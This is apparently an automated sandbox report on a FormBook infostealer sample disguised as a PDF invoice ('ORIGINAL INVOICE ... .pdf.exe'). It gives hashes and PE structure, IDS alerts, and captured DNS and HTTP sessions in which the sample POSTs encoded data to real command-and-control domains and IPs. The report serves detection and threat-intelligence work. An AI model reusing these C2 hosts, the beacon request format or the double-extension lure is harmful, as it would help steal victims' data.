                                https://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3DGet hashmaliciousHTMLPhisherBrowse
                                • 3.33.220.150
                                https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 3.33.220.150
                                https://wtm.ventes-privees-du-jour.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Get hashmaliciousUnknownBrowse
                                • 3.33.220.150
                                No context
                                No context
                                Process:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                Process:C:\Windows\SysWOW64\RpcPing.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):114688
                                Entropy (8bit):0.9746603542602881
                                Encrypted:false
                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.7471443661983495
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:ORIGINAL INVOICE COAU7230734298.pdf.exe
                                File size:767'488 bytes
                                MD5:7d3ee1a73d9fbef171c785801ffcaff2
                                SHA1:2ad9a95c9038e4d61c6d9cbee63746454454d502
                                SHA256:1897d47010a97079de62b957827fbecbdb4690ead4a51417fa6f1dccfc19f6c5
                                SHA512:47eed0fd3880965b6658a59cd012c7942d87f5df191c8e4505eb6635619e75cffdb51867b0ecb21b9dc185e8455fe16ee69ca977ca1a8e09a79b4a46df173dba
                                SSDEEP:12288:zXBE7tnCs0ul4P6CDhz6T2ORPWHsvP5t+0KgZBxSM:MkuaSCDBMesvRtbKj
                                TLSH:E2F4E0D03B36B319DDA96A30C629DDB493B81D68B040B9E35EDD3B97759C211AE0CF42
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............Z.... ........@.. ....................... ............@................................
                                Icon Hash:90cececece8e8eb0
                                Entrypoint:0x4bc95a
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0xAFFFFCB7 [Fri Jul 27 19:12:55 2063 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc907 | 0x4f | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbe000 | 0x60c | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc0000 | 0xc | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0xbb5f0 | 0x70 | .text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0xba960 | 0xbaa00 | a00a3f3b437793afac9e429a587ada8f | False | 0.8996985934360349 | data | 7.754463700440127 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc | 0xbe000 | 0x60c | 0x800 | 76b0b748474bd8db5876cac0e88c5d17 | False | 0.3349609375 | data | 3.422694002308539 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0xc0000 | 0xc | 0x200 | 558ef16a8c883bad0f4a9c3cd7cfdd8b | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                RT_VERSION | 0xbe090 | 0x37c | data | | | 0.4226457399103139
                                RT_MANIFEST | 0xbe41c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                DLL | Import
                                mscoree.dll | _CorExeMain
                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                2024-10-02T02:06:28.163634+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56825 | 85.159.66.93 | 80 | TCP
                                2024-10-02T02:06:30.710433+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56826 | 85.159.66.93 | 80 | TCP
                                2024-10-02T02:06:33.257293+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56827 | 85.159.66.93 | 80 | TCP
                                2024-10-02T02:06:41.993230+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56829 | 185.106.176.204 | 80 | TCP
                                2024-10-02T02:06:44.549267+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56830 | 185.106.176.204 | 80 | TCP
                                2024-10-02T02:06:47.089054+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56831 | 185.106.176.204 | 80 | TCP
                                2024-10-02T02:06:56.491974+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56833 | 52.223.13.41 | 80 | TCP
                                2024-10-02T02:06:58.051773+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56834 | 52.223.13.41 | 80 | TCP
                                2024-10-02T02:07:00.520885+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 56835 | 52.223.13.41 | 80 | TCP
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Oct 2, 2024 02:06:10.083976984 CEST | 192.168.2.4 | 1.1.1.1 | 0xc2b4 | Standard query (0) | www.yippie.world | A (IP address) | IN (0x0001) | false
                                Oct 2, 2024 02:06:26.541539907 CEST | 192.168.2.4 | 1.1.1.1 | 0x995f | Standard query (0) | www.kartal-nakliyat.xyz | A (IP address) | IN (0x0001) | false
                                Oct 2, 2024 02:06:39.980294943 CEST | 192.168.2.4 | 1.1.1.1 | 0x2b | Standard query (0) | www.sidqwdf.fun | A (IP address) | IN (0x0001) | false
                                Oct 2, 2024 02:06:40.976269960 CEST | 192.168.2.4 | 1.1.1.1 | 0x2b | Standard query (0) | www.sidqwdf.fun | A (IP address) | IN (0x0001) | false
                                Oct 2, 2024 02:06:54.684022903 CEST | 192.168.2.4 | 1.1.1.1 | 0xfe31 | Standard query (0) | www.resellnexa.shop | A (IP address) | IN (0x0001) | false

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Oct 2, 2024 02:06:10.101419926 CEST | 1.1.1.1 | 192.168.2.4 | 0xc2b4 | No error (0) | www.yippie.world | yippie.world |  | CNAME (Canonical name) | IN (0x0001) | false
                                Oct 2, 2024 02:06:10.101419926 CEST | 1.1.1.1 | 192.168.2.4 | 0xc2b4 | No error (0) | yippie.world |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                Oct 2, 2024 02:06:10.101419926 CEST | 1.1.1.1 | 192.168.2.4 | 0xc2b4 | No error (0) | yippie.world |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                Oct 2, 2024 02:06:26.639929056 CEST | 1.1.1.1 | 192.168.2.4 | 0x995f | No error (0) | www.kartal-nakliyat.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                Oct 2, 2024 02:06:26.639929056 CEST | 1.1.1.1 | 192.168.2.4 | 0x995f | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                Oct 2, 2024 02:06:26.639929056 CEST | 1.1.1.1 | 192.168.2.4 | 0x995f | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                                Oct 2, 2024 02:06:41.113035917 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b | No error (0) | www.sidqwdf.fun |  | 185.106.176.204 | A (IP address) | IN (0x0001) | false
                                Oct 2, 2024 02:06:41.113049984 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b | No error (0) | www.sidqwdf.fun |  | 185.106.176.204 | A (IP address) | IN (0x0001) | false
                                Oct 2, 2024 02:06:54.946362972 CEST | 1.1.1.1 | 192.168.2.4 | 0xfe31 | No error (0) | www.resellnexa.shop |  | 52.223.13.41 | A (IP address) | IN (0x0001) | false
                                • www.yippie.world
                                • www.kartal-nakliyat.xyz
                                • www.sidqwdf.fun
                                • www.resellnexa.shop
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.4 | 56824 | 3.33.130.190 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:10.134159088 CEST | 497 | OUT | GET /pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI= HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-us
                                Connection: close
                                Host: www.yippie.world
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Oct 2, 2024 02:06:11.499744892 CEST | 398 | IN | HTTP/1.1 200 OK
                                Server: openresty
                                Date: Wed, 02 Oct 2024 00:06:11 GMT
                                Content-Type: text/html
                                Content-Length: 258
                                Connection: close
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI="}</script></head></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.4 | 56825 | 85.159.66.93 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:26.657737970 CEST | 779 | OUT | POST /n8ew/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 199
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.kartal-nakliyat.xyz
                                Origin: http://www.kartal-nakliyat.xyz
                                Referer: http://www.kartal-nakliyat.xyz/n8ew/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Ascii: -L=VpseEu0Le7StXxKfNhik5nx++ZgIRSxCSdiOR82VvmGHveO3pBT7RXc+c9vTioOExp/UmLiKq5qidVFVEgdb4LQtLDkm7KPFUq2b17EMbgykw58BtK/3IQ2uTP1RVz8+GcDnHTlJs2qdA1bOjwuW9LiF3GPk2JkgrY/jYZdh5ou+maEaUNqMAxyLkgCdzQOkrQ==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.4 | 56826 | 85.159.66.93 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:29.197730064 CEST | 799 | OUT | POST /n8ew/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 219
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.kartal-nakliyat.xyz
                                Origin: http://www.kartal-nakliyat.xyz
                                Referer: http://www.kartal-nakliyat.xyz/n8ew/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Ascii: -L=VpseEu0Le7StNRafPG+k+Hx9y5gIbyxGSd+OR5bYvViHu7y3qFH7SXc+UdvWsIOfxpzymOiKq4KidQhVFXxEqrQzeTkk46PFUq2b17RbbhakwJMBsvTwWA2tUP1RDD93GcDFHS4Ss0SdAxfOtBuV2LiDq2Op3d9yu7WgSYYAn6exq8VAF8LbSxW45nLp+TztwShawRgYabgNujx6c6zOSQc=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.4 | 56827 | 85.159.66.93 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:31.745949984 CEST | 10881 | OUT | POST /n8ew/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 10299
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.kartal-nakliyat.xyz
                                Origin: http://www.kartal-nakliyat.xyz
                                Referer: http://www.kartal-nakliyat.xyz/n8ew/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                4 | 192.168.2.4 | 56828 | 85.159.66.93 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:34.288280964 CEST | 504 | OUT | GET /n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhov HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-us
                                Connection: close
                                Host: www.kartal-nakliyat.xyz
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Oct 2, 2024 02:06:34.961744070 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                Server: nginx/1.14.1
                                Date: Wed, 02 Oct 2024 00:06:34 GMT
                                Content-Length: 0
                                Connection: close
                                X-Rate-Limit-Limit: 5s
                                X-Rate-Limit-Remaining: 19
                                X-Rate-Limit-Reset: 2024-10-02T00:06:39.8601907Z


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                5 | 192.168.2.4 | 56829 | 185.106.176.204 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:41.159516096 CEST | 755 | OUT | POST /c6mm/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 199
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.sidqwdf.fun
                                Origin: http://www.sidqwdf.fun
                                Referer: http://www.sidqwdf.fun/c6mm/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Ascii: -L=32RFuPbn26FT9o9tn4G2bklZU1GlE6bpp8Ew0MEhi9i0uxE72yRvQuLvnnG48Y1Mnf9fFU/S3hE7wkwBaUWFi7HY3JEZlij4tpnvvFNGj01lRJqkv21AhJo4vdljXr+ZgewEDY14K6E49SiriI3OX2/kTYutwhnDx8eO3ROZjSlBepkQtjBUyc2sk+BoBNDNKA==
                                Oct 2, 2024 02:06:41.993045092 CEST | 720 | IN | HTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Wed, 02 Oct 2024 00:06:41 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 555
                                Connection: close
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                6 | 192.168.2.4 | 56830 | 185.106.176.204 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:43.697858095 CEST | 775 | OUT | POST /c6mm/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 219
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.sidqwdf.fun
                                Origin: http://www.sidqwdf.fun
                                Referer: http://www.sidqwdf.fun/c6mm/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Ascii: -L=32RFuPbn26FT9INt0Ku2cElaX1GlKqbtp8Iw0NwxjIK0vQ073zRvdOLv/XG54Y1HnfxtFUDS3hQ7wg8BanOGjrHa+pEb6yj4tpnvvFohj0dlS4akg31Hrpo7qtljE7+dgexTDZYvK4s49TSriZ3NMG/9c4v4807KpeWO+jugtAdfWP1K8SgDgcSf55IcMO+ERLMVqG7NAPMuYOeHyZBLoPM=
                                Oct 2, 2024 02:06:44.549160957 CEST | 720 | IN | HTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Wed, 02 Oct 2024 00:06:44 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 555
                                Connection: close
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                7 | 192.168.2.4 | 56831 | 185.106.176.204 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:46.249010086 CEST | 10857 | OUT | POST /c6mm/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 10299
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.sidqwdf.fun
                                Origin: http://www.sidqwdf.fun
                                Referer: http://www.sidqwdf.fun/c6mm/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Ascii: -L= [TRUNCATED]
                                Oct 2, 2024 02:06:47.083098888 CEST | 720 | IN | HTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Wed, 02 Oct 2024 00:06:46 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 555
                                Connection: close
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                8 | 192.168.2.4 | 56832 | 185.106.176.204 | 80 | 4248 | C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Oct 2, 2024 02:06:48.795732975 CEST | 496 | OUT | GET /c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhov HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-us
                                Connection: close
                                Host: www.sidqwdf.fun
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Oct 2, 2024 02:06:49.661814928 CEST | 720 | IN | HTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Wed, 02 Oct 2024 00:06:49 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 555
                                Connection: close
